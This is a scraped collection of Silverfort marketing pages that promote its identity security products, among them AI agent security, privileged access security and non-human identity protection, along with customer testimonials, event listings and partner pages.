privilege escalation impossible. Learn more about our platform How it works Protect every agent, every action, and every connection point. Deploy without disruption. Deploy within days to get immediate protection of AI agent activity without slowing innovation or impacting your end users. Integrate MCP servers seamlessly with common enterprise services for instant visibility and control. Control all your AI agents and their usage of enterprise systems in one place. Get full visibility into every AI agent and MCP server in action in your environments, and manage all configurations, secrets, and policies from a single platform. Enforce least-privilege and dynamic access controls. Reduce the risk of unauthorized use—including lateral movement and privilege escalation—by enforcing precise, real-time access controls inline between agents and MCP servers. Want to adopt AI securely and accelerate innovation? We found a way. Set up a demo to see Silverfort's AI Agent Security in action. Learn more Explore blog --- - Published: 2025-06-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mutiny-front-page-june-2025/ The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human or machine, cloud or on-prem. Get a demo or Take a platform tour Privileged Access Security Privileged Access Security (PAS) Go beyond managing privileged accounts NHI Security Non-Human Identity (NHI) Security Discover and protect non-human identities Universal MFA Universal MFA Extend multi-factor authentication to any system Authentication Firewall Authentication Firewall Stop unauthorized access with
Zero Trust policies ITDR Identity Threat Detection
& Response Detect and respond to attacks in real time ISPM Identity Security Posture Management Uncover, map and analyze identity security exposures AI Agent Security AI Agent Security Govern, monitor and protect your AI agents Proven technology Trusted by 1,000+ organizations. The # 1 attack Surface Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots. Why Silverfort The Silverfort identity security platform Secure your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end Identity protection for on-prem, cloud, humans and machines. Protect the unprotectable Including systems that no other solution can cover. Zero changes To your systems, minimizing disruptions and cost. Discover the platform Where’s the gap in your identity defense? Privileged Access Security NHI Security Universal MFA Authentication Firewall ITDR ISPM AI Agent Security Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to take identity security further. The results speak for themselves. Hear from our customers Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom ParkerVP of IT & CISO | Kayak "We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs. " Janusz Wreba-JaworskiCyber Security Manager | Womble Bond Dickinson "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William WooGroup CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture. ” Katie McMillanInformation Security Manager | Agilisys Latest blogs Explore our blog --- - Published: 2025-06-09 - Modified: 2025-06-10 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/cyber-insurance-ecosystem-sudvers/ Silverfort's Cyber Insurance Ecosystem Südvers SÜDVERS ist ein mehrfach ausgezeichneter international tätiger Versicherungs- und Risikoexperte für Mittelstand und Industrie, der passgenaue Lösungen zur weltweiten Risikoabsicherung bietet. Das inhabergeführte Unternehmen hat es sich zur Aufgabe gemacht, Menschen und Unternehmen zu schützen. Unter Einsatz eigener Softwareanwendungen betreibt SÜDVERS Risikomanagement mit System und kombiniert globale Lösungen mit lokaler Expertise. Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-05-29 - Modified: 2025-08-21 - URL: https://www.silverfort.com/test-flight-world-tour-2025/ Test Flight World Tour 2025 Buckle up for the Silverfort Test Flight World Tour, a hands-on identity security experience like no other. Join us for live, complimentary sessions across the globe where you'll see what teams can achieve with identity security done right. Browse upcoming Test Flights How it works If you're an enterprise identity security professional, then Test Flight is for you. You should attend if: You manage identity management or security tools You have responsibility within the IAM strategy You're ready to learn about the Silverfort Identity Security Platform Browse upcoming Test Flights If you don't meet the above criteria but you're still keen to find out more about Silverfort, feel free to contact us here. Sample Agenda Get to know your hosts! Introductions with Silverfort and our in-region sponsor. Get hands-on with advanced security measures against identity-based threats. Hear from our customers or discover the latest innovations in identity security. Let's get lunch or catch up at happy hour! You should attend if: You manage identity management or security tools You have responsibility within the IAM strategy You're ready to learn about the Silverfort Identity Security Platform Browse upcoming Test Flights If you don't meet the above criteria but you're still keen to find out more about Silverfort, feel free to contact us here. Sample Agenda Get to know your hosts! Introductions with Silverfort and our in-region sponsor. Get hands-on with advanced security measures against identity-based threats. Hear from our customers or discover the latest innovations in identity security. Let's get lunch or catch up at happy hour! Browse our upcoming Test Flights Click on the location that suits you to find out more and request an invite. August 28th Melbourne, Australia Register now September 2nd Canberra, Australia Register now September 4th Cape Town, South Africa Sponsored by Register now September 10th Adelaide, Australia Register now September 25th Sydney, Australia Register now — More events coming soon — Past Test Flights Tampa, FL, United States Sponsored by Registration closed July 30th Pittsburgh, PA, United States Sponsored by Registration closed July 29th Lagos, Nigeria Sponsored by Registration closed July 17th Pretoria, South Africa Sponsored by Registration closed July 3rd | 9am – 1pm BST London, UK Cathedral View, St Vincent's Centre, SW1P 1NL Registration closed Don't see a Test Flight in your city? Join our mailing list to hear about upcoming Test Flights. Want to join us for a Test Flight? Browse our upcoming Test Flights above and hit "Request an invite" to let us know you'd like to attend. A member of our team will be in touch to confirm your space. Browse upcoming Test Flights --- - Published: 2025-05-29 - Modified: 2025-06-13 - URL: https://www.silverfort.com/ai-identity-security-design-partner/ Shape the future of AI agent security with Silverfort We're empowering CISOs to lead secure AI adoption by treating AI agents as identities—governed, visible, and protected with the same rigor applied to human users. Join the waitlist to build the future of AI agent security. Join the waitlist. window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "b8f4149d-e298-4a79-8fa6-7f05134a5ab3", target: "#hbspt-form-b8f4149d-e298-4a79-8fa6-7f05134a5ab3", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-b8f4149d-e298-4a79-8fa6-7f05134a5ab3"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Securing AI agents starts with treating them as an identity Our method for securing AI is built on a simple premise: AI agents must be treated as identities, and they should be tied to a person. Discover, classify, monitor Get full observability over all your AI agents based on their real-world behavior. Tie every action to a human Build accountability by connecting every agent to a responsible person. Get dynamic, least-privilege policies Tailor your access policies to each AI agent's role at scale. Become a pioneer in AI identity security If you’re leading AI adoption and need to secure it fast, we want to work with you. Become a design partner --- - Published: 2025-04-20 - Modified: 2025-05-13 - URL: https://www.silverfort.com/take-a-tour-pas-features/ Discover the identity security platform Take a tour of our Privileged Access Solution Explore the Silverfort Privleged Access Solution at your own pace. Discover how to: Discover all your privileged accounts. Apply virtual fencing to prevent privileged account abuse. Protect privileged accounts with Just in Time (JIT) access. Rated 4. 8 on Gartner Peer Insights --- - Published: 2025-04-16 - Modified: 2025-08-01 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/arch-insurance/ Silverfort's Cyber Insurance Ecosystem Arch Insurance Arch is an S&P 500 company and leading diversified insurer and reinsurer, providing customised specialty risk solutions to clients worldwide across a wide range of industries. Pursuing Better Together® encapsulates how Arch always aspires to do business. From underwriting to handling claims, it’s an approach based on collaboration, responsiveness and a genuine commitment to continually raising the bar. How Silverfort and Arch Insurance work together Arch’s partnership with Silverfort demonstrates our commitment to delivering comprehensive cybersecurity solutions that help businesses stay protected in today’s complex and evolving threat landscape. By combining insurance coverage with cyber security expertise, we provide our clients with holistic protection and the tools to enhance their resilience against cyber attacks. Exclusively for Arch Insureds Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help Arch Insurance clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-03-26 - Modified: 2025-03-28 - URL: https://www.silverfort.com/take-a-tour-get-a-demo/ Take a tour Click below to launch an interactive tour. Get a demo Complete the form below to book a demo. --- - Published: 2025-03-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/cloud-nhi-signup/ Your cloud NHI journey starts here Extend your non-human identity security to the cloud with the new Silverfort solution! Discover NHIs such as service accounts, access keys, tokens, certificates, and more across cloud IdPs, cloud infrastructure, and SaaS applications. Detect over 48 types of cloud NHIs and gain insights into their effective privileges and activity patterns. Uncover ownership, expose dormant or unrotated credentials, and identify partially off-boarded identities to improve lifecycle management. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "b8f4149d-e298-4a79-8fa6-7f05134a5ab3", target: "#hbspt-form-b8f4149d-e298-4a79-8fa6-7f05134a5ab3", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-b8f4149d-e298-4a79-8fa6-7f05134a5ab3"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Only Silverfort provides end-to-end identity security for on-prem, cloud, humans and NHIs in a single platform. Protect both on-prem service accounts and cloud NHIs from a single platform, instead of relying on silos and point solutions. Complete visibility over every NHI You can’t protect what you can’t see. Uncover your full inventory of NHIs. Map destinations, sources, privilege levels & security posture. Prioritize & mitigate the most critical exposures Minimize your attack surface and address the important compliance gaps in your environments. Remediate effectively to reduce risks Address security and lifecycle gaps by identifying account ownership and actionable recommendations. Learn more about our platform --- - Published: 2025-03-11 - Modified: 2025-03-26 - URL: https://www.silverfort.com/take-a-tour-lp-paid/ Discover the identity security platform Take a tour of Silverfort Explore the Silverfort Identity Security Platform at your own pace. Discover how to: Secure your entire IAM infrastructure from within. Discover and protect every dimension of identity, everywhere. Get maximum security with minimal effort. Rated 4. 8 on Gartner Peer Insights --- - Published: 2025-02-24 - Modified: 2025-02-26 - URL: https://www.silverfort.com/solutions-and-use-cases/ The identity security platform Your problems. Our solutions. Finally, a complete identity security platform that covers all identities, all resources and all environments. Get a demo or Take a tour Use cases Identity-first incident response Block lateral movement, detect and isolate compromised users, and accelerate recovery in Active Directory environments under attack – because in an incident, every second counts. It’s like having a firewall on your domain controllers. Read more Service Account Protection Easily discover, classify, and secure your AD service accounts. Gain full visibility into their activities and enforce virtual fencing policies to secure them against compromise. Read more Ransomware & Lateral Movement Defend against ransomware attacks and put a stop to lateral movement by detecting and blocking malicious authentications as they happen. Read more Active Directory Protection Automatically discover all your users and service accounts and enforce identity access controls on every critical resource, from command-line access to file shares, legacy apps, IT infrastructure and many more. Read more Cyber Insurance Meet and exceed the extended MFA requirements of cyber insurance policies with end-to-end identity security. Rapid implementation. Rapid compliance. Rapid return on investment. Read more Regulatory Compliance Compliance with regulations and standards is critical to every organization. Meet the identity security requirements of key cybersecurity regulations with Silverfort’s MFA, PAM, and service account protection. Read more Identity Zero Trust Bring zero trust to the identity control plane without any changes to the networking infrastructure with our unified, universal identity security. Read more Secure Privileged Access Detecting and blocking malicious authentications as they happen is the only way to protect your environment against the lateral movement attacks that cut through endpoint and network defenses. Read more OT Network Protection Enhance the resilience of your OT networks by securing its convergence interfaces with the IT network at layer 3. 5 and securing engineers and service accounts access in production zone. Read more Learn more about our platform Industries Manufacturing Protect your industrial networks and overcome the risks of third-party access. Read more Telecoms Mitigate the risk of malicious access across complex telecom environments. Read more Retail Gain the upper hand against ransomware and lateral movement. Read more Education Empower students and staff to access every resource securely and safely. Read more Healthcare Safeguard patient information, mission-critical applications and other sensitive data. Read more Finance Increase your resilience against identity threats across your entire hybrid environment. Read more Learn more about our platform --- - Published: 2025-02-21 - Modified: 2025-03-12 - URL: https://www.silverfort.com/take-a-tour/ Take a tour of the platform Discover the Silverfort Identity Security Platform. Which Identity Security product would you like to explore? Rated 4. 8 on Gartner Peer Insights Privileged Access Security NHI Security Universal MFA Authentication Firewall Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. The results speak for themselves. Hear from our customers Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs. " Janusz Wreba-JaworskiCyber Security Manager | Womble Bond Dickinson "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom ParkerVP of IT & CISO | Kayak "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William WooGroup CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture. ” Katie McMillanInformation Security Manager | Agilisys --- - Published: 2025-02-18 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/non-human-identity-security/ Non-Human Identity Security Every non-human identity—in view and in control. Discover and scale protection to all non-human identities in your identity infrastructure with a single click. Cloud and on-prem. Known and unknown. Get a demo or Take a tour We protect all non-human identities, no matter the scale or complexity. Uncover all your machine identities, service accounts and other NHIs for stronger protection. Gain accurate insight into their behavior, protect at scale with auto-generated policies, and stop attackers from moving laterally. Complete visibility over every NHI—even unknowns You can’t protect what you can’t see. Uncover your full inventory of NHIs. Map destinations, sources, privilege levels and security posture. Lateral movement prevention Place a virtual fence around each service account to block access when it deviates from its standard behavior. Single click protection for scale Seamlessly protect privileged service accounts without rotating their passwords, avoiding the risk of breaking the processes they manage. Learn more about our platform "Service accounts are a security nightmare because you can’t put MFA on them. Silverfort was able to protect what no one else can. Of the security tools that we use, Silverfort has a very high return on investment. ” Tom Parker VP of IT & CISO, Kayak Automatically discover and secure every NHI in your environment—no exceptions. Uncover every non-human identity. See all the non-human identities in your environments, with granular insights into their activities, risk indicators and usage patterns. Classify and prioritize. Uncover the different types of NHIs and their behavior to build a protection roadmap that aligns with your needs. Protect with virtual fencing. Apply and enforce virtual fences to block any deviation that stems from a compromise. Automate to scale with Smart Policy. Scale protection to multiple service accounts in a single click with our Smart Policy. How Silverfort identifies, validates and protects NHIs. Take a tour of NHI Security Learn more Explore blog --- - Published: 2025-02-17 - Modified: 2025-02-25 - URL: https://www.silverfort.com/scrolling-test/ Automatically discover and protect every service account in your environment—no exceptions. Uncover every non-human identity. See all the non-human identities in your environments, with granular insights into their activities, risk indicators and usage patterns. Learn more Classify and prioritize. Uncover the different types of NHIs and their behavior to build a protection roadmap that aligns with your needs. Learn more Protect with virtual fencing. Apply and enforce virtual fences to block any deviation that stems from a compromise. Learn more Automate to scale with Smart Policy. Scale protection to multiple service accounts in a single click with our Smart Policy. Learn more --- - Published: 2025-02-16 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/ot-networks/ OT Network protection Identity security for OT networks. Enhance the resilience of your OT networks by securing its convergence interfaces with the IT network at layer 3. 5 and securing engineers and service accounts access in production zone. Get a demo or Take a tour Identity security is mission critical. Silverfort enables your to secure the full identity attack surface of your OT networks, from continuous discovery and removal of exposures to proactive prevention of malicious access. Identity DMZ. Implement identity segmentation on zone 3. 5 to maintain strict access control between IT and OT zones, on top of the existing network base separation for both human operators and service accounts. Production zone secure access. Enforce FIDO2 MFA policies for login to resources on zones 2 and 3 and use virtual fencing to ensure that service accounts that manage flow of operational data are not being abused. Exposure management and threat protection. Monitor continuously to find and resolve security weaknesses that expose your user accounts to compromise, and stop malicious access attempts in real-time. Learn more about our platform The Silverfort Identity Security Platform How it works Secure all user access. Comprehensive admin access protection. Map all admins that perform cross-zone connections, confine their access to predesignated resources only, and continuously monitor their security posture to ensure their resilience. MFA for air gapped networks. Configure MFA policies that don’t depend on Internet connectivity to operate, using FIDO2 hardware tokens to access engineering workstations, SCADA servers and other production resources. Stop ransomware spread. Combine MFA and Authentication Firewall policies to block ransomware’s lateral movement that could originate from the IT portion of the environment and endanger production processes. Map all admins that perform cross-zone connections, confine their access to predesignated resources only, and continuously monitor their security posture to ensure their resilience. Configure MFA policies that don’t depend on Internet connectivity to operate, using FIDO2 hardware tokens to access engineering workstations, SCADA servers and other production resources. Combine MFA and Authentication Firewall policies to block ransomware’s lateral movement that could originate from the IT portion of the environment and endanger production processes. Take a platform tour Learn more Explore blog --- - Published: 2025-02-14 - Modified: 2025-05-13 - URL: https://www.silverfort.com/why-silverfort/ Where identity meets security Maximum security, minimal effort. Identity security done right. Discover exposures and stop attacks before they cause damage. Enforce security controls across all IAM silos. All in a single platform. Get a demo or Take a tour Why choose the Silverfort Identity Security Platform 10B Authentications analyzed and protected everyday. 34K Real identity exposures & threats detected on average per customer. 17x Faster deployment compared to traditional solutions on average. the #1 Attack Surface Yesterday’s solutions cannot solve today’s identity security challenges. Silos and point solutions Patchworks and one-off solutions leave you exposed and create a large attack surface. Critical security blind spots You can’t secure what you can’t see. Existing solutions leave non-human identities, command-line interfaces, IT/OT infrastructure and more unprotected. Endless effort and cost Current tools are expensive, disruptive and take years to implement, resulting in countless security gaps. Silos and point solutions Patchworks and one-off solutions leave you exposed and create a large attack surface. Critical security blind spots You can’t secure what you can’t see. Existing solutions leave non-human identities, command-line interfaces, IT/OT infrastructure and more unprotected. Endless effort and cost Current tools are expensive, disruptive and take years to implement, resulting in countless security gaps. No more patchworks and one-offs. Break the silos and secure without limits. Finally, a complete identity security platform that covers all identities, all resources and all environments—freeing you to focus on what’s next. All you need in one platform Replace point solutions with a single platform for all human and non-human identities, on-prem and in the cloud. Secure every identity and resource Enable security controls like MFA and JIT where no other solution can, from legacy systems to command-line tools. Faster and easier No more endless implementations and user interruptions. Deploy seamlessly without modifying your existing systems. Learn more about our platform Protect the unprotectable. LDAP apps Network devices Local accounts Shared network drives Legacy systems Remote PowerShell Service accounts Databases IT infrastructure PsExec vCenter RDP SSH Run as admin OT systems WMI LDAP apps Network devices Local accounts Shared network drives Legacy systems Remote PowerShell Service accounts Databases IT infrastructure PsExec vCenter RDP SSH Run as admin OT systems WMI Finally, a platform for both identity and security teams. You shouldn’t have to choose between security and productivity. We built a platform that IAM teams can operate and security teams can trust. For Security teams Stop attacks before they spread. Detect and prevent account takeover, privilege escalation and lateral movement with the most advanced identity security controls, fully integrated with your tools and processes. For IAM teams One platform for every identity. Discover every identity for complete observability. Enforce protection without modifications or disruptions. Resolve hygiene issues, fill compliance gaps and demonstrate immediate value. Learn more about our platform Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "It’s amazing how simple it was to deploy Silverfort—it only took a few hours to get up and running. As a result of Silverfort, our admin users are protected with strong MFA controls, and we closely monitor any malicious use of authentication protocols. " Lee HumphreysInfrastructure Security Architect | London Borough of Waltham Forest “We highly recommend Silverfort, as the identity insights you get, the flexibility for policy enforcement, and the granularity have been critical for our success in protecting our environments. ” Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson “Since deploying Silverfort, we have applied security controls and MFA protection to legacy applications, a vital step in improving our environments against ransomware threats. " Kurt GielenIT Manager | ZOL “Silverfort’s authentication firewall has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources. ” Head of IAMLeading Retail Organization Identity security that works for you. Go beyond the limits of traditional identity security. Set up a demo to experience unified protection that stops identity-based attacks. Get a demo --- - Published: 2025-02-12 - Modified: 2025-05-13 - URL: https://www.silverfort.com/customer-stories/ Customer stories Finally, the identity security platform you deserve Discover how organizations around the world rely on Silverfort to transform their identity security. Read their stories and see the results for yourself. Get a demo or Take a tour We help Kayak protect what no one else can. Kayak’s Tom Parker, VP of IT & CISO, and Austin Michaels, Security Engineer, explain how Silverfort enabled them to extend MFA to on-prem apps and command-line access as well as put real-time protection on service accounts. Watch the case study We help Huntsville Hospital protect what matters most. Huntsville Hospital’s CIO, Rick Corn, and IT Security Officer, Ryan Petraszewsky, discuss how Silverfort helped them to implement real-time protection against identity-based attacks on all critical healthcare operations, protecting even the most sensitive resources and data. Watch the case study Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "It’s amazing how simple it was to deploy Silverfort—it only took a few hours to get up and running. As a result of Silverfort, our admin users are protected with strong MFA controls, and we closely monitor any malicious use of authentication protocols. " Lee HumphreysInfrastructure Security Architect | London Borough of Waltham Forest “We highly recommend Silverfort, as the identity insights you get, the flexibility for policy enforcement, and the granularity have been critical for our success in protecting our environments. ” Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson “Since deploying Silverfort, we have applied security controls and MFA protection to legacy applications, a vital step in improving our environments against ransomware threats. " Kurt GielenIT Manager | ZOL “Silverfort’s authentication firewall has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources. ” Head of IAMLeading Retail Organization Case studies Browse our full library Browse our full library Industries Manufacturing Protect your industrial networks and overcome the risks of third-party access. Read more Telecoms Mitigate the risk of malicious access across complex telecom environments. Read more Retail Gain the upper hand against ransomware and lateral movement. Read more Education Empower students and staff to access every resource securely and safely. Read more Healthcare Safeguard patient information, mission-critical applications and other sensitive data. Read more Finance Increase your resilience against identity threats across your entire hybrid environment. Read more Learn more about our platform --- - Published: 2025-02-07 - Modified: 2025-08-18 - URL: https://www.silverfort.com/newsroom/ News and press Latest news from Silverfort Want to find out what Silverfort has been up to? You've come to the right place. Contact our PR team June 18, 2025 Silverfort unveils AI Agent Security to protect agentic identities, securing MCP deployments with inline, dynamic security controls Company News, Press Release, Product Release Read more June 5, 2025 Silverfort Appoints Howard Greenfield as President & Chief Revenue Officer Company News, Press Release Read more Latest press releases View all Silverfort in the news View all Let's connect Alicia Divittorio Head of Global Corporate Marketing Contact Alicia Contact us --- - Published: 2025-02-06 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/securing-privileged-user-access/ Securing privileged access Critical users. Constant protection. Detecting and blocking malicious authentications as they happen is the only way to protect your environment against the lateral movement attacks that cut through endpoint and network defenses. Get a demo or Take a tour Privileged users—monitored and protected. Silverfort makes the critical task of protecting admin users within reach, with automated discovery, and virtual fencing policies for both human user and service accounts, enables you to achieve full protection in a rapid, seamless manner. Automated discovery and mapping Unveil all admin accounts based on actual user activity so you don’t limit protection only to the ones you’re aware of. Virtual fencing policies Activate access policies that confine your admin accounts to access only the resources within their access tiers or standard activity, blocking access to any other resource. Continuous monitoring and threat detection Gain insight into any weakness that exposes your admin to compromise and detect any attempted malicious credential access, privilege escalation, and lateral movement TTP. Learn more about our platform The Silverfort Identity Security Platform How it works End to end admin access protection. Secure privileged service account Locate all your privileged service account and group theme in a policy that binds their access to the critical resources they manage not allowing them to access any other. Enforce tiered access on your admins Configure access policies for your tier 0 and tier 1 admins to limit their access to resources within their tiers only to proactively limit the blast radius in a compromise scenario. Safeguard access with JIT and MFA Activate additional security layers for admin access for resources within their tier, with JIT mechanism that enables their account upon access request, and MFA to mitigate the risk of compromise. Locate all your privileged service account and group theme in a policy that binds their access to the critical resources they manage not allowing them to access any other. Configure access policies for your tier 0 and tier 1 admins to limit their access to resources within their tiers only to proactively limit the blast radius in a compromise scenario. Activate additional security layers for admin access for resources within their tier, with JIT mechanism that enables their account upon access request, and MFA to mitigate the risk of compromise. Take a platform tour Learn more Explore blog --- - Published: 2025-02-05 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/active-directory-protection/ Active Directory Protection See, know, and secure every user access. Automatically discover all your users and service accounts and enforce identity access controls on every critical resource, from command-line access to file shares, legacy apps, IT infrastructure and many more. Get a demo or Take a tour The Silverfort Identity Security Platform Protect the unprotectable. Silverfort natively integrates with your Active Directory, so you get visibility, risk analysis and enforcement on every user access to your critical resources. Identify threat exposures Discover and resolve security weaknesses that expose your user accounts to malicious credential access, privilege escalation, or lateral movement. Privileged access security Safeguard your privileged admins and service accounts with automated discovery and enforcement of least privileged access policies within days from initial deployment. MFA without limits Apply MFA policies to every AD managed resource, regardless of the underlying authentication protocol, and protect any access method from direct login to command line access. Learn more about our platform The Silverfort Identity Security Platform How it works Every user. Every resource. Increase AD hygiene Discover stale users and machines, failed authentications, misconfigurations, malpractices, and legacy settings that burden your DCs to optimize operation and avoid resource consumption. Enforce identity segmentation Configure granular access policies to ensure that your users don’t have excessive access to resources they don’t need, and restrict your admins’ access to resources within their designated tier. Prevent malicious access Use Deny Access policies for service accounts and MFA for your human users to mitigate the risk of malicious access with compromised credentials to any resource. Discover stale users and machines, failed authentications, misconfigurations, malpractices, and legacy settings that burden your DCs to optimize operation and avoid resource consumption. Configure granular access policies to ensure that your users don’t have excessive access to resources they don’t need, and restrict your admins’ access to resources within their designated tier. Use Deny Access policies for service accounts and MFA for your human users to mitigate the risk of malicious access with compromised credentials to any resource. Take a platform tour Learn more Explore blog --- - Published: 2025-02-05 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/service-account-security/ securing Active Directory Service accounts Visibility and protection without limits. Easily discover, classify, and secure your AD service accounts. Gain full visibility into their activities and enforce virtual fencing policies to secure them against compromise. Get a demo or Take a tour No longer a blind spot. Overcome all the traditional difficulties of service account protection and make what was once a painstaking manual effort into an easy, automated task. Visibility into all accounts Automate the discovery of each and every service account in your environment, its type, privilege level, and security posture. Activity mapping Drill down to find your service accounts’ sources and destinations to discover the processes they support and any application dependencies. Protection at scale Apply auto-generated policies to protect multiple accounts in a single click, confining them to their designated destinations and blocking any access outside this scope. Learn more about our platform The Silverfort Identity Security Platform How it works From visibility to protection, the whole journey made easy. Discover and classify See all your service accounts with zero manual effort. Get deep insights into their activity patterns, types and any potential misuse, as well as their the activity patterns and indicators of potential risk. Map and prioritize Single out the accounts that matter most based on their access privilege access, target services, and other parameters of choice, so your critical accounts are first in line to be protected. Protect and scale Group accounts of your choice under a smart policy that can detect when each of them deviates from its access baseline and either alerts or block its access. Add more accounts to this policy as you gradually progress in coverage. See all your service accounts with zero manual effort. Get deep insights into their activity patterns, types and any potential misuse, as well as their the activity patterns and indicators of potential risk. Single out the accounts that matter most based on their access privilege access, target services, and other parameters of choice, so your critical accounts are first in line to be protected. Group accounts of your choice under a smart policy that can detect when each of them deviates from its access baseline and either alerts or block its access. Add more accounts to this policy as you gradually progress in coverage. Take a platform tour Learn more Explore blog --- - Published: 2024-12-02 - Modified: 2025-08-21 - URL: https://www.silverfort.com/pas-signup/ Start Your Journey With Silverfort’s Privileged Access Security (PAS) Your PAS Journey Starts Here Silverfort offers a new approach to overcoming the limitations of traditional PAM solutions by enabling you to instantly discover and classify all privileged accounts, ensuring that no account goes unnoticed. Silverfort provides comprehensive security capabilities designed to protect privileged users from being compromised. Whether used alongside existing PAM solutions for full coverage or as a standalone solution, Silverfort enhances organizational resilience by closing critical security gaps and simplifying the protection of privileged access. window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "4f770e54-0cb3-424d-aa65-2653f52539ba", target: "#hbspt-form-4f770e54-0cb3-424d-aa65-2653f52539ba", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-4f770e54-0cb3-424d-aa65-2653f52539ba"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Rapid, automatic, continuous privileged access security. Leave no account behind. Our patented technology discovers, classifies and protects privileged accounts end-to-end from within the IAM infrastructure, so you get broad, real-time protection within days. Automated discovery Automatically detect all privileged accounts based on actual access privileges and easily determine if accounts are being used outside of their intended purposes. Least & Just-in-Time privileges Grant access rights only when and to what’s necessary, ensuring accounts are unusable by default to achieve zero standing privileges at scale. Rapid deployment Deploy seamlessly into existing environments for rapid time-to-value and a streamlined user experience with Silverfort’s unique architecture. Learn more about our platform --- - Published: 2024-11-14 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/privileged-access-security/ Privileged access security (PAS) Go beyond managing your privileged accounts. Secure them. Don’t wait until it's too late. Discover, classify and enforce least privilege and Just-In-Time (JIT) access policies for all your privileged users within days. Get a demo or Take a tour Rapid, automatic, continuous privileged access security. Leave no account behind. Our patented technology discovers, classifies and protects privileged accounts end-to-end from within the IAM infrastructure, so you get broad, real-time protection within days. Automated discovery Automatically detect all privileged accounts based on actual access privileges and easily determine if accounts are being used outside of their intended purposes. Least & Just-in-Time privileges Grant access rights only when and to what’s necessary, ensuring accounts are unusable by default to achieve zero standing privileges at scale. Rapid deployment Deploy seamlessly into existing environments for rapid time-to-value and a streamlined user experience with Silverfort’s unique architecture. Learn more about our platform One of identity security’s biggest challenges: solved. Discover Discover and classify all your privileged accounts Automate the discovery and classification of all privileged accounts based on actual authentication activity. Prioritize and implement security controls tailored to each tier while detecting privilege escalation potential. Detect actual access usage patterns and behavior to classify different user tiers. Protect Fence all your privileged accounts to their intended purpose Restrict admin account usage to specific sources, destinations, and protocols to minimize risk. Limit the misuse of admin accounts outside their intended purpose and block lateral movement attempts. Prevent privilege escalation and cross-tier access with a single click. 